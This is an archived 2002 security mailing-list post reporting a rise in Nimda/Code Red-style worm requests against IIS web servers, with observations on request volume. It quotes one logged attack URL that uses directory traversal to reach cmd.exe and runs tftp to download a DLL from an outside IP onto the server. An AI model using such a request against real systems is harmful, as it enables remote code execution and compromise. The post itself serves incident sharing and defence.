Increase in Nimda/Code Red Variants - New Requests Made
From: Joshua_Hiller@aeanet.orgDate: 02/27/02
- Previous message: John.Swarbrick@pnl.co.uk: "Re: "Nimda"?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: incidents@securityfocus.com From: Joshua_Hiller@aeanet.org Date: Tue, 26 Feb 2002 18:10:59 -0800
I am also seeing an upsurge in Nimda-Like exploit requests.
This is just one example.
http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.19
7180.98%20GET%20cool.dll%20c:\httpodbc.dll.
Users IP : 65.197.180.98
New DLL's are showing up in these requests, although the methods of
execution remain the same. Perhaps someone has thrashed another core
IIS/Win32 dll and is attempting to exploit? Pretty sure httpodbc.dll is in
use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;))
Another thing I've noticed is the number of requests per IP has gone up.
Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between
50 and 80 from the infected host.
It does still appear to be automated / worm activity.
Just thought I'd let the lists know. ;-)
Joshua Hiller
Manager Web Operations
AeA
Advancing the Business of Technology
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: John.Swarbrick@pnl.co.uk: "Re: "Nimda"?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
